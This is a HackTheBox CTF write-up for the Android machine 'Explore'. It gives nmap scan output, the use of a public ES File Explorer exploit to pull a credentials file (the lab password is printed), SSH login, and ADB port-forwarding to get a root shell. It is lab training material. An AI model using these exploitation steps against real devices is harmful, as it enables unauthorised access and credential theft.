HackTheBox: Explore Writeups
3 min readNov 11, 2021
Initial Foothold
As usual, i started with network scanning using nmap.
sudo nmap -p- -A 10.10.10.247
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
2PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
42855/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or olderNetwork Distance: 2 hopsTRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 300.71 ms 10.10.14.1
2 301.27 ms 10.10.10.247
Port 59777 have a known vulnerability, the exploit also available on exploit-db
https://www.exploit-db.com/exploits/50070
Exploiting User
Using listPics
command, we got interesting file
We can read that interesting file using getFile
command
python 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg
user : kristi
pass : Kr1sT!5h@Rp3xPl0r3!
we can use previous credentials to login with ssh.
user flag located at /sdcard/user.txt
Privilege Escalation
Following from that article, if the adb just can be accessed from localhost only, we must doing port-forwarding
ssh kristi@explore.htb -L 5555:127.0.0.1:5555 -p 2222# on other terminal
adb connect losalhost:5555
adb -s localhost:5555 shell
su
the root flag located at /data/root.txt